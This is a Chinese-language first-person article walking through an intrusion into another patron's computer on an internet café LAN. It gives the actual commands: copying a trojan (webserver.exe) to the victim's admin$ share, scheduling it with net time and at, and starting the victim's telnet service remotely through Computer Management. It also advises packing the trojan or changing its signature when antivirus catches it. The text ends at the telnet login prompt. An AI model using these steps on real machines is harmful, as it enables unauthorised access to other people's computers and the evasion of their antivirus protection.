实战经验：网吧入侵过程全方位剖析

核心提示： 接着G:/>copy webserver.exe //192.168.0.225/admin$已复制 1 个文件，G:/>net time //192.168.0.225//192.168.0.225 的当前时间是 2005/2/5 下午 05:00命令成功完成，实战经验：网吧

接着

G:/>copy webserver.exe //192.168.0.225/admin$

已复制 1 个文件。

G:/>net time //192.168.0.225

//192.168.0.225 的当前时间是 2005/2/5 下午 05:00

命令成功完成。

图4

G:/>at //192.168.0.225 17:02 webserver.exe

用AT命令启动webserver.exe.

2分钟过后.在IE里输入192.168.0.225.就可以控制对方了...可是偶一会用net time查看时.都已经过了3分钟了.还是打不开....后来又重新来了一次.眼睛就盯着MM的屏幕看,才发现到了我指定的时间.程序执行时.被瑞星给杀了...

FT....我说那.

难道就没办法了吗...当然不是...可以换个别的马或加壳.修改它特征码什么的.但在网吧工具也不是很齐全.我也懒的下..

还好微软为我们提供了一个非常不错的系统工具....也算的上是一类控制软件了...

打开控制面板--管理工具--计算机管理

操作-连接到另一计算机.

然后输入IP192.168.0.225

图5

呵.等一会就可以看到成功了...你看到了什么?

更爽的是我们可以远程开启他的服务...在这里启动他的telnet服务.

图6　　OK了...

本地打开一cmd

输入

G:/>telnet 192.168.0.225

回车后出现

Server allows NTLM authentication only